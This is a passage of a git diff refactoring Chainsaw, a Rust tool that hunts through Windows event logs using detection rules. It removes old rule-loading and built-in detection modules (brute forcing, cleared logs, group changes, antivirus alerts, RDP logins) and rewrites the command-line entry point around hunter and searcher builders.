verbose { - for rule in &rules { - println!( - "{}", - serde_yaml::to_string(&rule).expect("could not serialise") - ); - } - } - for file in rules { - let rule: ChainsawRule = match serde_yaml::from_value(file) { - Ok(e) => e, - Err(e) => { - failed += 1; - if check { - let file_name = - match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - cs_eprintln!("[!] {:?}: {}", file_name, e); - } - continue; - } - }; - // Remove rules that are excluded in the mapping file - if let Some(exclusion) = &mapping.exclusions { - if exclusion.contains(&rule.tag) { - failed += 1; - if check { - let file_name = - match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - cs_eprintln!( - "[!] {:?} is excluded in mapping file", - file_name - ); - } - continue; - }; - }; - chainsaw_rules.push(rule); - count += 1; - } - } - } - Some(RuleType::Stalker) => { - for path in rule_files { - let rule: ChainsawRule = match stalker::load(&path) { - Ok(e) => e, - Err(e) => { - failed += 1; - if check { - let file_name = match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - cs_eprintln!("[!] {:?}: {}", file_name, e); - } - continue; - } - }; - // Remove any < HIGH level rules - if let Some(level) = rule.level.clone() { - match level.as_str() { - "high" => {} - "critical" => {} - _ => continue, - }; - } - // Remove non-stable rules - if let Some(status) = rule.status.clone() { - match status.as_str() { - "stable" => {} - _ => continue, - }; - } - // Remove rules that are excluded in the mapping file - if let Some(exclusion) = &mapping.exclusions { - if exclusion.contains(&rule.tag) { - failed += 1; - if check { - let file_name = match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - cs_eprintln!("[!] {:?} is excluded in mapping file", file_name); - } - continue; - }; - }; - chainsaw_rules.push(rule); - count += 1; - } - } - None => { - return Err(anyhow!( - "Error in mapping file: '{}' is not a valid rule kind", - mapping.kind - )) - } - } - } else { - return Err(anyhow!("Invalid input path: {}. The rule parameter requires a directory path containing detection rules", path.display())); - } - } else { - return Err(anyhow!("Invalid input path: {}", path.display())); - }; - if count == 0 && !check { - return Err(anyhow!( - "Rule directory specified, but no valid rules found!" - )); - } - if failed > 0 { - if check { - cs_eprintln!(); - } - cs_eprintln!( - "[+] Loaded {} detection rules ({} were not loaded)", - count, - failed - ); - } else { - cs_eprintln!("[+] Loaded {} detection rules", count); - } - Ok(chainsaw_rules) -} diff --git a/src/hunt/modules.rs b/src/hunt/modules.rs deleted file mode 100644 index 530ee8d7..00000000 --- a/src/hunt/modules.rs +++ /dev/null @@ -1,730 +0,0 @@ -use super::ChainsawRule; -use super::Detection; -use super::Events; -use super::HuntOpts; -use crate::util::RULE_PREFIX; -use regex::Regex; -use serde_json::Value; -use std::collections::HashMap; -use tau_engine::Value as Tau; -use tau_engine::{AsValue, Document}; -extern crate ajson; - -pub struct Wrapper<'a>(&'a serde_json::Value); -impl<'a> Document for Wrapper<'a> { - fn find(&self, key: &str) -> Option> { - self.0.get(key).map(|v| v.as_value()) - } -} - -fn split_tag(tag_name: String, target: usize) -> String { - let mut count = 0; - let mut chars = Vec::with_capacity(tag_name.len()); - for char in tag_name.chars() { - count += 1; - if count > target && char.is_whitespace() { - count = 0; - chars.push('\n'); - } else { - chars.push(char); - } - } - chars.into_iter().collect() -} - -fn get_tau_matches( - mut data: serde_json::Value, - chainsaw_rules: &[ChainsawRule], -) -> Option<(String, String)> { - let mut matches = vec![]; - let mut authors = vec![]; - - // TAU specific fix to make sure raw.ex.name is set to just the image name, not the full path - if let Some(name) = data.get("raw.ex.name") { - let re = Regex::new(r"([a-zA-Z0-9]+\.exe)").expect("Regex failed to build"); - if let Some(exe_name) = re.find(&name.to_string()) { - data["raw.ex.name"] = json!(exe_name.as_str()) - } - }; - // Check the doc for any tau rule matches - for rule in chainsaw_rules { - if rule.logic.matches(&Wrapper(&data)) { - if rule.tag.len() > 20 { - let title = split_tag(rule.tag.clone(), 20); - matches.push(format!("{}{}", RULE_PREFIX, title)); - } else { - matches.push(format!("{}{}", RULE_PREFIX, rule.tag.clone())); - } - // To comply to the sigma DRL we need to display rule author information - if let Some(x) = &rule.authors { - authors.push(format!("{}{}", RULE_PREFIX, x.join("\n"))) - } else { - authors.push(format!("{}Unknown", RULE_PREFIX)); - } - } else { - continue; - } - } - if matches.is_empty() { - return None; - } - // Flatten vec here - Some((matches.join("\n"), authors.join("\n"))) -} - -fn format_time(event_time: String) -> String { - let chunks = event_time.rsplit('.').last(); - match chunks { - Some(e) => e.replace("T", " ").replace('"', ""), - None => event_time, - } -} - -pub fn extract_logon_fields(event: &serde_json::value::Value) -> Option> { - // Extract the key fields from login events and load them into a struct and return - // We don't need to return column headers as they can be derived from the struct fields later - - let mut values = HashMap::new(); - values.insert( - "logon_type".to_string(), - event["Event"]["EventData"]["LogonType"].to_string(), - ); - values.insert( - "target_username".to_string(), - event["Event"]["EventData"]["TargetUserName"].to_string(), - ); - values.insert( - "workstation_name".to_string(), - event["Event"]["EventData"]["WorkstationName"].to_string(), - ); - values.insert( - "ip_address".to_string(), - event["Event"]["EventData"]["IpAddress"].to_string(), - ); - values.insert( - "computer".to_string(), - event["Event"]["System"]["Computer"].to_string(), - ); - values.insert( - "system_time".to_string(), - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - ); - values.insert( - "process_name".to_string(), - event["Event"]["EventData"]["ProcessName"].to_string(), - ); - Some(values) -} - -pub fn detect_created_users(event: &serde_json::value::Value, event_id: &u64) -> Option { - let title = String::from("(Built-in Logic) - New User Created"); - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "target_username".to_string(), - "user_sid".to_string(), - ]; - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - event_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - event["Event"]["EventData"]["TargetUserName"].to_string(), - event["Event"]["EventData"]["TargetSid"].to_string(), - ]; - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -fn format_field_length(mut data: String, full_output: &bool, length: usize) -> String { - // Take the context_field and format it for printing. Remove newlines, break into even chunks etc. - // If this is a scheduled task we need to parse the XML to make it more readable - - data = data - .replace("\n", "") - .replace("\r", "") - .replace("\t", "") - .replace(" ", " ") - .chars() - .collect::>() - .chunks(length) - .map(|c| c.iter().collect::()) - .collect::>() - .join("\n"); - - let truncate_len = 1000; - - if !*full_output && data.len() > truncate_len { - data.truncate(truncate_len); - data.push_str("...\n\n(use --full to show all content)"); - } - data -} - -pub fn detect_tau_matches( - event: &serde_json::value::Value, - event_id: u64, - chainsaw_rules: &[ChainsawRule], - id_mappings: &HashMap, - full_output: &bool, - col_width: i32, - show_authors: &bool, -) -> Option { - let command_line; - let mut headers = vec![]; - let title; - - // Build JSON doc dynamically from the fields provided in the mapping file - let mut doc = json!({}); - match id_mappings.get(&event_id) { - Some(fields) => { - // Get the provider and make sure it matches the mapping file this EventID - // This allows us to make sure that we don't process EventIDs from other providers - if let Some(provider) = - ajson::get(&event.to_string(), "Event.System.Provider_attributes.Name") - { - if provider.to_string() != fields.provider { - return None; - } - } else { - //cs_eprintln!("ERROR Could not find provider") - return None; - } - - // Loop through every specified field and attempt to match to the current event doc - for (k, v) in &fields.search_fields { - let h = match ajson::get(&event.to_string(), v) { - Some(h) => h.to_string(), - None => { - // cs_eprintln!("{} - could not match: {}", event_id, v); - // cs_eprintln!("{:?}", event); - continue; - } - }; - doc[k] = json!(h); - } - doc["EventID"] = json!(event_id); - - // Find the context_field and extract it's value from the event - command_line = match fields.table_headers.get("context_field") { - Some(a) => match ajson::get(&event.to_string(), a) { - Some(v) => { - if v.to_string().is_empty() { - "".to_string() - } else { - format_field_length(v.to_string(), full_output, col_width as usize) - } - } - None => "context_field not found!".to_string(), - }, - None => "context_field not set".to_string(), - }; - } - None => return None, - }; - - let (hits, authors) = match get_tau_matches(doc, chainsaw_rules) { - Some(ret) => ret, - None => return None, - }; - - let mut values = vec![]; - match id_mappings.get(&event_id) { - Some(fields) => { - // Set table title - title = format!("(External Rule) - {}", fields.title.clone()); - - // The first column should always be the system time - headers.push("system_time".to_string()); - match ajson::get( - &event.to_string(), - "Event.System.TimeCreated_attributes.SystemTime", - ) { - // The normal event time includes milliseconds which is un-necessary - Some(time) => { - values.push(format_time(time.to_string())); - } - None => values.push("".to_string()), - } - // Set hardcoded table headers and values - headers.push("id".to_string()); - headers.push("detection_rules".to_string()); - if *show_authors { - headers.push("rule_authors".to_string()); - } - headers.push("computer_name".to_string()); - match fields.table_headers.get("context_field") { - Some(v) => headers.push(v.to_string()), - None => headers.push("context_field".to_string()), - }; - - values.push(event_id.to_string()); - values.push(hits); - if *show_authors { - values.push(authors); - } - values.push(event["Event"]["System"]["Computer"].to_string()); - values.push(command_line); - for (k, v) in &fields.table_headers { - if k == "context_field" { - continue; - } - // Insert the table headers - headers.push(k.to_string()); - // Insert the table values - match ajson::get(&event.to_string(), v) { - Some(b) => { - let b = b.to_string(); - if b.is_empty() { - values.push("".to_string()) - } else { - values.push(format_field_length(b, full_output, col_width as usize)) - } - } - None => values.push("Invalid Mapping".to_string()), - }; - } - } - None => return None, - } - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_group_changes(event: &serde_json::value::Value, e_id: &u64) -> Option { - let group = event["Event"]["EventData"]["TargetUserName"].to_string(); - - // Filter for Admin groups and RDP groups - if !group.contains("Admin") && !group.contains("Remote Desktop") { - return None; - } - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "change_type".to_string(), - "user_sid".to_string(), - "target_group".to_string(), - ]; - let title = String::from("(Built-in Logic) - User added to interesting group"); - - let change_type; - match e_id { - 4728 => change_type = "User added to global group".to_string(), - 4732 => change_type = "User added to local group".to_string(), - 4756 => change_type = "User added to universal group".to_string(), - _ => return None, - } - - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - e_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - change_type, - event["Event"]["EventData"]["MemberSid"].to_string(), - event["Event"]["EventData"]["TargetUserName"].to_string(), - ]; - - // Build detection to return - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_cleared_logs(event: &serde_json::value::Value, e_id: &u64) -> Option { - if event["Event"]["UserData"]["LogFileCleared"]["SubjectUserName"].is_null() { - return None; - } - - let mut headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "subject_user".to_string(), - ]; - - let mut values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - e_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - event["Event"]["UserData"]["LogFileCleared"]["SubjectUserName"].to_string(), - ]; - - let title = match e_id { - 1102 => "(Built-in Logic) - Security audit log was cleared".to_string(), - 104 => { - headers.push("channel".to_string()); - values.push(event["Event"]["UserData"]["LogFileCleared"]["Channel"].to_string()); - "(Built-in Logic) - System log was cleared".to_string() - } - _ => return None, - }; - - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_stopped_service( - event: &serde_json::value::Value, - event_id: &u64, -) -> Option { - let action = event["Event"]["EventData"]["param2"].to_string(); - let service_name = event["Event"]["EventData"]["param1"].to_string(); - let title = String::from("(Built-in Logic) - Event Log Service Stopped"); - - // Only check for the windows event logs service being stopped - // We can add more services here as needed - if !service_name.contains("Windows Event Log") || !action.contains("disabled") { - return None; - } - - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "service_name".to_string(), - "status".to_string(), - ]; - - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - event_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - service_name, - action, - ]; - - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_defender_detections( - event: &serde_json::value::Value, - e_id: &u64, - full_output: bool, - col_width: i32, -) -> Option { - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "threat_name".to_string(), - "threat_file".to_string(), - "user".to_string(), - ]; - let title = String::from("(Built-in Logic) - Windows Defender Detections"); - - let mut threat_path = event["Event"]["EventData"]["Path"].to_string(); - - threat_path = format_field_length(threat_path, &full_output, col_width as usize); - - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - e_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - event["Event"]["EventData"]["Threat Name"].to_string(), - threat_path, - event["Event"]["EventData"]["Detection User"].to_string(), - ]; - - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_ultralight_detections( - event: &serde_json::value::Value, - e_id: &u64, - full_output: bool, - col_width: i32, -) -> Option { - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "threat_name".to_string(), - "threat_file".to_string(), - "sha1".to_string(), - ]; - let title = String::from("(Built-in Logic)) - F-Secure AV Detections"); - - // Access F-Secure detection data which is in a nested json string - let detection_data = match event["Event"]["EventData"]["rv"].as_str() { - Some(x) => match serde_json::from_str::(x) { - Ok(y) => y, - Err(_) => return None, - }, - None => return None, - }; - - let threat_path = format_field_length( - detection_data["obj"]["ref"].to_string(), - &full_output, - col_width as usize, - ); - - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - e_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - detection_data["iname"].to_string(), - threat_path, - detection_data["obj"]["sha1"].to_string(), - ]; - - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_kaspersky_detections( - event: &serde_json::value::Value, - e_id: &u64, - full_output: bool, - col_width: i32, -) -> Option { - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "threat_file".to_string(), - "threat_name".to_string(), - ]; - let title = String::from("(Built-in Logic) - Kaspersky AV Detections"); - - let threat_path; - let threat_name; - - // Kaspersky puts the relevant data in a Vec. Here we locate it and extract the key fields - if let Some(threat_data) = ajson::get(&event.to_string(), "Event.EventData.Data") { - threat_path = match threat_data.to_vec().get(0) { - Some(a) => a.clone(), - None => return None, - }; - threat_name = match threat_data.to_vec().get(1) { - Some(a) => a.clone(), - None => return None, - } - } else { - return None; - } - - let threat_path = - format_field_length(threat_path.to_string(), &full_output, col_width as usize); - - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - e_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - threat_path, - threat_name.to_string(), - ]; - - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_sophos_detections( - event: &serde_json::value::Value, - e_id: &u64, - full_output: bool, - col_width: i32, -) -> Option { - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "threat_type".to_string(), - "threat_file".to_string(), - "threat_name".to_string(), - ]; - let title = String::from("(Built-in Logic) - Sophos AV Detections"); - - let threat_path; - let threat_name; - let threat_type; - - // Sophos puts the relevant data in a Vec. Here we locate it and extract the key fields - if let Some(threat_data) = ajson::get(&event.to_string(), "Event.EventData.Data") { - threat_type = match threat_data.to_vec().get(0) { - Some(a) => a.clone(), - None => return None, - }; - threat_path = match threat_data.to_vec().get(1) { - Some(a) => a.clone(), - None => return None, - }; - threat_name = match threat_data.to_vec().get(2) { - Some(a) => a.clone(), - None => return None, - } - } else { - return None; - } - - let threat_path = - format_field_length(threat_path.to_string(), &full_output, col_width as usize); - - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - e_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - threat_type.to_string(), - threat_path, - threat_name.to_string(), - ]; - - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_login_attacks(events: &[HashMap]) -> Option> { - let mut logon_tracker = HashMap::new(); - let failed_limit = 5; - - // Add up number of failed logins for each user - for event in events { - let username = event["target_username"].clone(); - if username == "null" { - continue; - } - *logon_tracker.entry(username).or_insert(0) += 1; - } - - // Filter out accounts below failed limit - logon_tracker.retain(|_, v| *v > failed_limit); - - if logon_tracker.keys().len() == 0 { - return None; - } - - let mut results = vec![]; - - //Account Brute Forcing - for (username, count) in &logon_tracker { - let title = String::from("(Built-in Logic) - Account Brute Forcing"); - - let headers = vec![ - "id".to_string(), - "username".to_string(), - "failed_login_count".to_string(), - ]; - - let values = vec!["4625".to_string(), username.clone(), count.to_string()]; - let ret = Detection { - headers, - title, - values, - }; - results.push(ret); - } - Some(results) -} - -pub fn filter_lateral_movement( - events: &[HashMap], - hunts: &HuntOpts, -) -> Option> { - let mut results = vec![]; - - // Create a hashmap of logon types we will include - let mut logon_types = HashMap::new(); - let mut title = String::from("(Built-in Logic) - RDP Logins"); - - logon_types.insert("10".to_string(), "rdp (type 10)"); - - if hunts.lateral_all { - logon_types.insert("2".to_string(), "interactive (type 2)"); - logon_types.insert("3".to_string(), "network (type 3)"); - logon_types.insert("4".to_string(), "batch (type 4)"); - logon_types.insert("5".to_string(), "service (type 5)"); - logon_types.insert("7".to_string(), "unlock (type 7)"); - title = String::from("4624 Logins"); - } - - for event in events { - if !logon_types.contains_key(&event["logon_type"]) { - continue; - } - - // Only show results where there's a source IP, this removes local events that cause noise - if event["ip_address"] == "\"-\"" - || event["ip_address"] == "\"127.0.0.1\"" - || event["ip_address"] == "\"::1\"" - { - continue; - } - - // Filter out machine accounts to reduce noise - if event["target_username"].to_string().ends_with("$\"") { - continue; - } - - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "workstation_name".to_string(), - "target_username".to_string(), - "source_ip".to_string(), - "logon_type".to_string(), - ]; - let values = vec![ - event["system_time"].to_string(), - "4624".to_string(), - event["workstation_name"].to_string(), - event["target_username"].to_string(), - event["ip_address"].to_string(), - logon_types.get(&event["logon_type"])?.to_string(), - ]; - let ret = Detection { - headers, - title: title.clone(), - values, - }; - results.push(ret); - } - - Some(results) -} diff --git a/src/lib.rs b/src/lib.rs index 7965b8b5..5ed06265 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -1,23 +1,20 @@ #[macro_use] extern crate anyhow; -extern crate evtx; -extern crate failure; -#[macro_use] -extern crate prettytable; -extern crate rayon; -extern crate serde; -#[macro_use] -extern crate serde_derive; -extern crate serde_yaml; -#[macro_use] -extern crate serde_json; -extern crate chrono; -extern crate structopt; + +pub(crate) use anyhow::Result; + +pub use file::{evtx, get_files, Reader}; +pub use hunt::{Detection, Hunter, HunterBuilder}; +pub use rule::{lint_rule, load_rule, Kind as RuleKind}; +pub use search::{Searcher, SearcherBuilder}; +pub use write::{set_writer, Format, Writer, WRITER}; #[macro_use] -pub mod write; -pub mod check; -pub mod convert; -pub mod hunt; -pub mod search; -pub mod util; +mod write; + +pub mod cli; +mod ext; +mod file; +mod hunt; +mod rule; +mod search; diff --git a/src/main.rs b/src/main.rs index 812e8c7b..f09053b4 100644 --- a/src/main.rs +++ b/src/main.rs @@ -1,34 +1,151 @@ -use anyhow::Result; -use std::fs::File; +#[macro_use] +extern crate chainsaw; -// TODO: Clean this, we have crudely split into a lib for testing purposes, this needs refinement. -use chainsaw::*; +use std::fs::File; +use std::path::PathBuf; +use anyhow::Result; +use chrono::NaiveDateTime; +use chrono_tz::Tz; use structopt::StructOpt; +use chainsaw::{ + cli, get_files, lint_rule, load_rule, set_writer, Format, Hunter, RuleKind, Searcher, Writer, +}; + #[derive(StructOpt)] #[structopt( name = "chainsaw", about = "Rapidly Search and Hunt through windows event logs" )] struct Opts { + /// Hide Chainsaw's banner. + #[structopt(long)] + no_banner: bool, #[structopt(subcommand)] - cmd: Chainsaw, + cmd: Command, } #[derive(StructOpt)] -enum Chainsaw { - /// Hunt through event logs using detection rules and builtin logic - #[structopt(name = "hunt")] - Hunt(hunt::HuntOpts), +enum Command { + /// Hunt through event logs using detection rules and builtin logic. + Hunt { + /// The path to a collection of rules. + rules: PathBuf, + + /// The paths to hunt through. + path: Vec, + + /// A mapping file to hunt with. + #[structopt(short = "m", long = "mapping", number_of_values = 1)] + mapping: Option>, + /// Additional rules to hunt with. + #[structopt(short = "r", long = "rule", number_of_values = 1)] + rule: Option>, + + /// Set the column width for the tabular output. + #[structopt(long = "column-width", conflicts_with = "json")] + column_width: Option, + /// Only hunt through files with the provided extension. + #[structopt(long = "extension")] + extension: Option, + /// The timestamp to hunt from. Drops any documents older than the value provided. + #[structopt(long = "from")] + from: Option, + /// Print the full values for the tabular output. + #[structopt(long = "full", conflicts_with = "json")] + full: bool, + /// Print the output in json format. + #[structopt(group = "format", long = "json")] + json: bool, + /// Allow chainsaw to try and load files it cannot identify. + #[structopt(long = "load-unknown")] + load_unknown: bool, + /// Output the timestamp using the local machine's timestamp. + #[structopt(long = "local", group = "tz")] + local: bool, + /// Apply addional metadata for the tablar output. + #[structopt(long = "metadata", conflicts_with = "json")] + metadata: bool, + /// The file to output to. + #[structopt(short = "o", long = "output")] + output: Option, + /// Supress informational output. + #[structopt(short = "q")] + quiet: bool, + /// Continue to hunt when an error is encountered. + #[structopt(long = "skip-errors")] + skip_errors: bool, + /// Output the timestamp using the timezone provided. + #[structopt(long = "timezone", group = "tz")] + timezone: Option, + /// The timestamp to hunt up to. Drops any documents newer than the value provided. + #[structopt(long = "to")] + to: Option, + }, + + /// Lint provided rules to ensure that they load correctly + Lint { + /// The path to a collection of rules. + path: PathBuf, + /// The kind of rule to lint. + #[structopt(long = "kind", default_value = "chainsaw")] + kind: RuleKind, + }, /// Search through event logs for specific event IDs and/or keywords - #[structopt(name = "search")] - Search(search::SearchOpts), + Search { + /// A pattern to search for. + #[structopt(required_unless = "regexp")] + pattern: Option, + + /// The paths to search through. + path: Vec, - /// Validate provided detection rules to ensure they load correctly - #[structopt(name = "check")] - Check(check::CheckOpts), + /// A pattern to search for. + #[structopt(short = "e", long = "regexp", number_of_values = 1)] + regexp: Option>, + + /// Only search through files with the provided extension. + #[structopt(long = "extension")] + extension: Option, + /// The timestamp to search from. Drops any documents older than the value provided. + #[structopt(long = "from")] + from: Option, + /// Ignore the case when searching patterns + #[structopt(short = "i", long = "ignore-case")] + ignore_case: bool, + /// Print the output in json format. + #[structopt(long = "json")] + json: bool, + /// Allow chainsaw to try and load files it cannot identify. + #[structopt(long = "load-unknown")] + load_unknown: bool, + /// Output the timestamp using the local machine's timestamp. + #[structopt(long = "local", group = "tz")] + local: bool, + /// The file to output to. + #[structopt(short = "o", long = "output")] + output: Option, + /// Supress informational output. + #[structopt(short = "q")] + quiet: bool, + /// Continue to search when an error is encountered. + #[structopt(long = "skip-errors")] + skip_errors: bool, + /// Tau expressions to search with. + #[structopt(short = "t", long = "tau")] + tau: Option>, + /// The field that contains the timestamp. + #[structopt(long = "timestamp", requires_if("from", "to"))] + timestamp: Option, + /// Output the timestamp using the timezone provided. + #[structopt(long = "timezone", group = "tz")] + timezone: Option, + /// The timestamp to search up to. Drops any documents newer than the value provided. + #[structopt(long = "to")] + to: Option, + }, } fn print_title() { @@ -45,94 +162,270 @@ fn print_title() { ); } -fn main() { - // Get command line arguments - let opt = Opts::from_args(); - // Load up the writer - let writer = match &opt.cmd { - Chainsaw::Hunt(args) => { - let output = match &args.output { - Some(path) => { - let file = match File::create(path) { - Ok(f) => f, - Err(e) => { - return exit_chainsaw(Err(anyhow::anyhow!( - "Unable to write to specified output file - {} - {}", - path.display(), - e - ))); - } - }; - Some(file) +fn init_writer(output: Option, json: bool, quiet: bool) -> crate::Result<()> { + let output = match &output { + Some(path) => { + let file = match File::create(path) { + Ok(f) => f, + Err(e) => { + return Err(anyhow::anyhow!( + "Unable to write to specified output file - {} - {}", + path.display(), + e + )); } - None => None, }; - if args.json { - write::Writer { - format: write::Format::Json, - output, - quiet: args.quiet, - } - } else if let Some(dir) = &args.csv { - write::Writer { - format: write::Format::Csv(dir.clone()), - output, - quiet: args.quiet, + Some(file) + } + None => None, + }; + let format = if json { Format::Json } else { Format::Std }; + let writer = Writer { + format, + output, + quiet, + }; + set_writer(writer).expect("could not set writer"); + Ok(()) +} + +fn run() -> Result<()> { + let opts = Opts::from_args(); + match opts.cmd { + Command::Hunt { + rules, + path, + + mapping, + rule, + + load_unknown, + column_width, + extension, + from, + full, + json, + local, + metadata, + output, + quiet, + skip_errors, + timezone, + to, + } => { + init_writer(output, json, quiet)?; + if !opts.no_banner { + print_title(); + } + let mut rules = vec![rules]; + if let Some(rule) = rule { + rules.extend(rule) + }; + cs_eprintln!("[+] Loading rules..."); + let mut failed = 0; + let mut count = 0; + let mut rs = vec![]; + for path in &rules { + for file in get_files(path, &None)? { + match load_rule(&RuleKind::Sigma, &file) { + Ok(mut r) => { + count += 1; + rs.append(&mut r) + } + Err(_) => { + failed += 1; + } + } } + } + if failed > 0 { + cs_eprintln!( + "[+] Loaded {} detection rules ({} were not loaded)", + count, + failed + ); + } else { + cs_eprintln!("[+] Loaded {} detection rules", count); + } + let rules = rs; + let mut hunter = Hunter::builder() + .rules(rules) + .mappings(mapping.unwrap_or_default()) + .load_unknown(load_unknown) + .local(local) + .skip_errors(skip_errors); + if let Some(from) = from { + hunter = hunter.from(from); + } + if let Some(timezone) = timezone { + hunter = hunter.timezone(timezone); + } + if let Some(to) = to { + hunter = hunter.to(to); + } + let hunter = hunter.build()?; + let mut files = vec![]; + for path in &path { + files.extend(get_files(path, &extension)?); + } + let mut detections = vec![]; + let pb = cli::init_progress_bar(files.len() as u64, "Hunting".to_string()); + for file in &files { + pb.tick(); + detections.extend(hunter.hunt(file)?); + pb.inc(1); + } + pb.finish(); + if json { + cli::print_json(&detections, hunter.rules(), local, timezone)?; } else { - write::Writer { - format: write::Format::Std, - output, - quiet: args.quiet, + cli::print_detections( + &detections, + hunter.mappings(), + hunter.rules(), + column_width.unwrap_or(40), + full, + local, + metadata, + timezone, + ); + } + cs_eprintln!( + "[+] {} Detections found on {} documents", + detections.iter().map(|d| d.hits.len()).sum::(), + detections.len() + ); + } + Command::Lint { path, kind } => { + init_writer(None, false, false)?; + if !opts.no_banner { + print_title(); + } + cs_eprintln!("[+] Validating supplied detection rules..."); + let mut count = 0; + let mut failed = 0; + for file in get_files(&path, &None)? { + if let Err(e) = lint_rule(&kind, &file) { + failed += 1; + cs_eprintln!("[!] {}", e); + continue; } + count += 1; } + cs_eprintln!( + "[+] Validated {} detection rules ({} were not loaded)", + count, + failed + ); } - Chainsaw::Search(args) => { - let output = match &args.output { - Some(path) => { - let file = match File::create(path) { - Ok(f) => f, + Command::Search { + path, + + pattern, + regexp, + + extension, + from, + ignore_case, + json, + load_unknown, + local, + output, + quiet, + skip_errors, + tau, + timestamp, + timezone, + to, + } => { + init_writer(output, json, quiet)?; + if !opts.no_banner { + print_title(); + } + let mut paths = if regexp.is_some() { + let mut scratch = pattern + .as_ref() + .map(|p| vec![PathBuf::from(p)]) + .unwrap_or_default(); + scratch.extend(path); + scratch + } else { + path + }; + if paths.is_empty() { + paths.push( + std::env::current_dir().expect("could not get current working directory"), + ); + } + let mut files = vec![]; + for path in &paths { + files.extend(get_files(path, &extension)?); + } + let mut searcher = Searcher::builder() + .ignore_case(ignore_case) + .load_unknown(load_unknown) + .local(local) + .skip_errors(skip_errors); + if let Some(patterns) = regexp { + searcher = searcher.patterns(patterns); + } else if let Some(pattern) = pattern { + searcher = searcher.patterns(vec![pattern]); + } + if let Some(from) = from { + searcher = searcher.from(from); + } + if let Some(tau) = tau { + searcher = searcher.tau(tau); + } + if let Some(timestamp) = timestamp { + searcher = searcher.timestamp(timestamp); + } + if let Some(timezone) = timezone { + searcher = searcher.timezone(timezone); + } + if let Some(to) = to { + searcher = searcher.to(to); + } + let searcher = searcher.build()?; + cs_eprintln!("[+] Searching event logs..."); + if json { + cs_print!("["); + } + let mut hits = 0; + for file in &files { + for res in searcher.search(file)?.iter() { + let hit = match res { + Ok(hit) => hit, Err(e) => { - return exit_chainsaw(Err(anyhow::anyhow!( - "Unable to write to specified output file - {} - {}", - path.display(), - e - ))); + if skip_errors { + continue; + } + anyhow::bail!("Failed to search file... - {}", e); } }; - Some(file) + if json { + if !(hits == 0) { + cs_print!(","); + } + cs_print_json!(&hit)?; + } else { + cs_print_yaml!(&hit)?; + } + hits += 1; } - None => None, - }; - write::Writer { - format: write::Format::Std, - output, - quiet: args.quiet, } + if json { + cs_println!("]"); + } + cs_println!("[+] Found {} matching log entries", hits); } - _ => write::Writer::default(), - }; - write::set_writer(writer).unwrap(); - print_title(); - // Determine sub-command: hunt/search/check - let result = match opt.cmd { - Chainsaw::Search(args) => search::run_search(args), - Chainsaw::Hunt(args) => hunt::run_hunt(args), - Chainsaw::Check(args) => check::run_check(args), - }; - exit_chainsaw(result); + } + Ok(()) } -fn exit_chainsaw(result: Result) { - // Handle successful/failed status messages returned by chainsaw - std::process::exit(match result { - Ok(m) => { - cs_egreenln!("{}", m); - 0 - } - Err(e) => { - cs_eredln!("[!] Chainsaw exited: {}", e); - 1 - } - }) +fn main() { + if let Err(e) = run() { + cs_eredln!("[x] {}", e); + std::process::exit(1); + } } diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs new file mode 100644 index 00000000..dddcca9e --- /dev/null +++ b/src/rule/chainsaw.rs @@ -0,0 +1,15 @@ +use serde::Deserialize; +use tau_engine::Rule as Tau; + +#[derive(Clone, Debug, Deserialize)] +#[serde(rename_all = "lowercase")] +pub struct Rule { + pub level: String, + #[serde(alias = "title")] + pub tag: String, + #[serde(flatten)] + pub tau: Tau, + + pub authors: Vec, + pub status: String, +} diff --git a/src/rule/mod.rs b/src/rule/mod.rs new file mode 100644 index 00000000..9e11134f --- /dev/null +++ b/src/rule/mod.rs @@ -0,0 +1,99 @@ 